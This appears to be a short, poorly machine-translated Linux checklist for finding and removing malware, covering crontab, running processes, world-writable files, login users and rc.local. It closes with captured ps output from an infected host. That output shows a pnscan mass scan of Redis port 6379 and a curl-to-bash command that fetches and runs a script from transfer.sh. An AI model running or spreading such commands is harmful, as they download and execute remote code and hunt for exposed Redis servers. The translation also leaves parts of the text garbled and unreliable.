1. Below the TMP directory
2. Scheduled Tasks find out CRONTAB-E
3. Virus to download Ps-ef|egrep "Curl|wget" to see if there are any commands to download
4. Top to see which CPU occupies the highest
5. Find the target file in the Find/-perm 777 Directory 777 permissions file
6./etc/passwd The following file users which can log in, remove the abnormal can log on the user/bin/bash
7. View the power-on boot from the/etc/rc.local user
8.
[Email protected] tmp]# Ps-ef |grep Pnscan
Root 29073 5659 10 14:07? 00:00:02/usr/local/bin/pnscan-t512-r 6f 3a 4c 6e 2a 78-w 0d + 0a 0d 0a 6e more than 6f, 0d, 0a 31.105.0.0/16 6379
Root 30141 4684 0 14:07 pts/1 00:00:00 grep pnscan
[Email protected] tmp]# Ps-ef|egrep Curl
Root 5655 5653 0 Apr27? 00:00:00/bin/sh-c curl-s https://transfer.sh/3EqNx/tmp.GewSw5ccS1 >. cmd && bash. cmd
Root 7838 4684 0 13:56 pts/1 00:00:00 egrep Curl
Several ideas of the Linux virus